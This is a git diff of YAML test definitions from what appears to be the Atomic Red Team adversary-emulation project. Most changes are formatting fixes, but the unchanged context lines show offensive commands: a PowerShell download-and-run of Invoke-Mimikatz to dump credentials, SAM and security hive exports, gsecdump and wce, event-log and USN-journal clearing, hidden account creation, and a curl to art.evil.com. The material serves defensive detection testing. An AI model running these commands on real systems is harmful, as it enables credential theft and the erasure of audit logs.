diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 00000000..b44f269c Binary files /dev/null and b/.DS_Store differ diff --git a/atomics/T1002/T1002.yaml b/atomics/T1002/T1002.yaml index 93950e31..35167ada 100644 --- a/atomics/T1002/T1002.yaml +++ b/atomics/T1002/T1002.yaml @@ -27,7 +27,7 @@ atomic_tests: TODO supported_platforms: - windows - input_argument: + input_arguments: input_file: description: Path that should be compressed into our output file type: Path @@ -44,11 +44,9 @@ atomic_tests: - name: Data Compressed - nix description: | TODO - supported_platforms: - linux - macos - executor: name: sh command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 2226eac7..a833cda1 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -13,7 +13,7 @@ atomic_tests: description: URL to a remote Mimikatz script that dumps credentials type: Url default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: + executor: name: powershell command: | IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds @@ -23,7 +23,7 @@ atomic_tests: https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 supported_platforms: - windows - executor: + executor: name: command_prompt command: | gsecdump -a @@ -33,26 +33,25 @@ atomic_tests: http://www.ampliasecurity.com/research/windows-credentials-editor/ supported_platforms: - windows - input_argument: + input_arguments: output_file: description: Path where resulting data should be placed type: Path default: output.txt - executor: + executor: name: command_prompt command: | wce -o #{output_file} - name: Registry dump of SAM, creds, and secrets description: | - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 supported_platforms: - windows - executor: + executor: name: command_prompt command: | - reg save HKLM\sam sam + reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security - diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 14219028..ace23084 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - servicename: + service_name: description: Name of service to start stop, query type: string default: svchost.exe diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 883ae0d4..6342ac94 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -27,7 +27,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of Computer type: string default: computer1 diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index 438a4281..639eb0a8 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -10,7 +10,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of remote computer type: strong default: computer1 diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index d7c6aa09..8ab2033c 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -24,7 +24,7 @@ atomic_tests: description: username for domain type: string default: atomic - passowrd: + password: description: password for user type: string default: atomic diff --git a/atomics/T1050/T1050.yaml b/atomics/T1050/T1050.yaml index 38434dfd..36cd2050 100644 --- a/atomics/T1050/T1050.yaml +++ b/atomics/T1050/T1050.yaml @@ -20,8 +20,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml index 9ca0a045..9484ef5a 100644 --- a/atomics/T1053/T1053.yaml +++ b/atomics/T1053/T1053.yaml @@ -54,11 +54,11 @@ atomic_tests: description: Target type: String default: localhost - UserName: + user_name: description: Username DOMAIN\User type: String default: DOMAIN\user - Password: + password: description: Password type: String default: At0micStrong diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml index 1c5e738e..c9319649 100644 --- a/atomics/T1070/T1070.yaml +++ b/atomics/T1070/T1070.yaml @@ -6,7 +6,6 @@ atomic_tests: - name: Clear Logs description: | Clear Windows Event Logs - supported_platforms: - windows input_arguments: @@ -14,33 +13,25 @@ atomic_tests: description: Windows Log Name, ex System type: String default: System - executor: name: command_prompt command: | evtutil cl #{log_name} - - name: FSUtil description: | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - supported_platforms: - windows - input_arguments: - executor: name: command_prompt command: | fsutil usn deletejournal /D C: - - name: rm -rf description: | Delete system and audit logs - supported_platforms: - macos - linux - executor: name: sh command: | diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index b7546064..d6a37515 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1085 display_name: Rundll32 atomic_tests: diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index 747f138c..95b599c3 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml @@ -68,7 +68,7 @@ atomic_tests: supported_platforms: - linux - macos - args: + input_arguments: output_file: description: Path where captured results will be placed type: Path diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 43baa340..05886865 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -6,12 +6,8 @@ atomic_tests: - name: Admin Account Manipulate description: | Manipulate Admin Account Name - supported_platforms: - windows - - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 7f089be6..c4b29d73 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1105 +attack_technique: T1105 display_name: Remote File Copy - + atomic_tests: - name: xxxx description: | @@ -9,7 +9,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: bash command: | ### TODO: Not sure how to handle commands that need to be run on multiple systems diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml index 7a216646..b801b26c 100644 --- a/atomics/T1117/T1117.yaml +++ b/atomics/T1117/T1117.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1117 display_name: Regsvr32 atomic_tests: diff --git a/atomics/T1118/T1118.yaml b/atomics/T1118/T1118.yaml index 7b52837b..7f9c9f89 100644 --- a/atomics/T1118/T1118.yaml +++ b/atomics/T1118/T1118.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1118 display_name: InstallUtil diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 304149a9..d510af56 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1121 display_name: RegSvcs/RegAsm diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index 0af7b43f..95c5e025 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: computer name to query type: string default: computer1 diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 287d94b1..a66b9942 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1127 display_name: Trusted Developer Utilities atomic_tests: diff --git a/atomics/T1130/T1130.yaml b/atomics/T1130/T1130.yaml index deb6f7a5..ffb45f99 100644 --- a/atomics/T1130/T1130.yaml +++ b/atomics/T1130/T1130.yaml @@ -1,14 +1,14 @@ --- -attack_technique: t1130 +attack_technique: T1130 display_name: Install Root Certificate - + atomic_tests: - name: Install root CA on CentOS/RHEL description: | Creates a root CA with openssl supported_platforms: - linux - args: + input_arguments: key_filename: description: Key we create that is used to create the CA certificate type: Path @@ -17,7 +17,7 @@ atomic_tests: description: Path of the CA certificate we create type: Path default: rootCA.crt - executor: + executor: name: sh command: | openssl genrsa -out #{key_filename} 4096 @@ -37,4 +37,4 @@ atomic_tests: # To test the new trust, apply the root certificate or another signed with it to # a SSL/TLS web service and attempt a connection with curl or wget. # -# curl https://art.evil.com \ No newline at end of file +# curl https://art.evil.com diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml index 0679a59b..09da49e7 100644 --- a/atomics/T1136/T1136.yaml +++ b/atomics/T1136/T1136.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1136 +attack_technique: T1136 display_name: Create Account - + atomic_tests: - name: Create a user account on a Linux system description: | @@ -9,15 +9,15 @@ atomic_tests: supported_platforms: - linux input_arguments: - username: + username: description: Username of the user to create type: String default: evil_user - comment: + comment: description: Comment to record when creating the user type: String default: Evil Account - executor: + executor: name: bash command: | useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} @@ -27,16 +27,16 @@ atomic_tests: Creates a user on a MacOS system with dscl supported_platforms: - macos - args: - username: + input_arguments: + username: description: Username of the user to create type: String default: evil_user - realname: + realname: description: "'realname' to record when creating the user" type: String default: Evil Account - executor: + executor: name: bash command: | dscl . -create /Users/#{username} diff --git a/atomics/T1139/T1139.yaml b/atomics/T1139/T1139.yaml index 41ce03b0..9f1685e8 100644 --- a/atomics/T1139/T1139.yaml +++ b/atomics/T1139/T1139.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1139 +attack_technique: T1139 display_name: Bash History - + atomic_tests: - name: xxxx description: | @@ -10,7 +10,7 @@ atomic_tests: - linux - macos input_arguments: - bash_history_filename: + bash_history_filename: description: Path of the bash history file to capture type: Path default: ~/.bash_history diff --git a/atomics/T1148/T1148.yaml b/atomics/T1148/T1148.yaml index f69f79d0..d95d2623 100644 --- a/atomics/T1148/T1148.yaml +++ b/atomics/T1148/T1148.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1146 +attack_technique: T1146 display_name: HISTCONTROL atomic_tests: diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 8cc1478f..47916540 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1170 display_name: Mshta diff --git a/atomics/T1173/T1173.yaml b/atomics/T1173/T1173.yaml index 6a38bc08..55b6d044 100644 --- a/atomics/T1173/T1173.yaml +++ b/atomics/T1173/T1173.yaml @@ -12,7 +12,6 @@ atomic_tests: executor: name: manual - command: | steps: | Open Microsoft Word diff --git a/atomics/T1179/T1179.yaml b/atomics/T1179/T1179.yaml index 556c0c92..b5e77bb3 100644 --- a/atomics/T1179/T1179.yaml +++ b/atomics/T1179/T1179.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1179 display_name: Hooking diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 8ef540f0..53753e6d 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -10,7 +10,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: executor: name: command_prompt command: | @@ -21,7 +20,6 @@ atomic_tests: and execute a payload leveraging PowerShell supported_platforms: - windows - input_arguments: executor: name: powershell command: |